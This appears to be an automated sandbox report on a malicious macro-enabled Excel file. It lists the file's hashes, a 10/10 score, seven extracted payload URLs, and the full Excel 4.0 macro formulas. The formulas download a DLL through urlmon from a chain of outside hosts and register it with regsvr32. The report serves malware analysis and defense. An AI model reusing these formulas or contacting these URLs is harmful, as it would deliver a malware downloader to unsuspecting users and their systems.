General
-
Target
715e95628b32d3f4420f55ccb4e7d7d4d3ad3ce9f1a242ca2d3d6899537a5e11
-
Size
49KB
-
Sample
241120-vvarrsznax
-
MD5
19bf435249b0b0e10074120226cce9cb
-
SHA1
fdfcaa2f9e7ae097bba4ba1fabc0e127ed5a9b50
-
SHA256
715e95628b32d3f4420f55ccb4e7d7d4d3ad3ce9f1a242ca2d3d6899537a5e11
-
SHA512
0be677cb15ff003686cdaa3ad4630b3b4a30ef2bd13675c9c11a3da01ecae0899968f092baf90ee2a4f455edcf2b446fc6cf325b90dfb46c78f12c7f62f95ab6
-
SSDEEP
1536:UkcEEt24xZdRBzH9hJBrdEwwNXekVIcog:tcEe2Kd3zdtdEwo/z
Behavioral task
behavioral1
Sample
715e95628b32d3f4420f55ccb4e7d7d4d3ad3ce9f1a242ca2d3d6899537a5e11.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
715e95628b32d3f4420f55ccb4e7d7d4d3ad3ce9f1a242ca2d3d6899537a5e11.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://ballpointmedia.com/css/WDvvKlTTncgkazP/
http://www.altoxi.com/UIc/04GtHAQGA/
http://www.apesb.com/language/IgWs7RRV/
http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/
http://www.techniquesbroadband.net/pay/Bxp/
http://www.arisgears.com/cgi-bin/dkeY/
https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ballpointmedia.com/css/WDvvKlTTncgkazP/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.altoxi.com/UIc/04GtHAQGA/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.apesb.com/language/IgWs7RRV/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.techniquesbroadband.net/pay/Bxp/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arisgears.com/cgi-bin/dkeY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()
Extracted
https://ballpointmedia.com/css/WDvvKlTTncgkazP/
http://www.altoxi.com/UIc/04GtHAQGA/
http://www.apesb.com/language/IgWs7RRV/
http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/
http://www.techniquesbroadband.net/pay/Bxp/
http://www.arisgears.com/cgi-bin/dkeY/
https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/
Targets
-
-
Target
715e95628b32d3f4420f55ccb4e7d7d4d3ad3ce9f1a242ca2d3d6899537a5e11
-
Size
49KB
-
MD5
19bf435249b0b0e10074120226cce9cb
-
SHA1
fdfcaa2f9e7ae097bba4ba1fabc0e127ed5a9b50
-
SHA256
715e95628b32d3f4420f55ccb4e7d7d4d3ad3ce9f1a242ca2d3d6899537a5e11
-
SHA512
0be677cb15ff003686cdaa3ad4630b3b4a30ef2bd13675c9c11a3da01ecae0899968f092baf90ee2a4f455edcf2b446fc6cf325b90dfb46c78f12c7f62f95ab6
-
SSDEEP
1536:UkcEEt24xZdRBzH9hJBrdEwwNXekVIcog:tcEe2Kd3zdtdEwo/z
Score10/10 -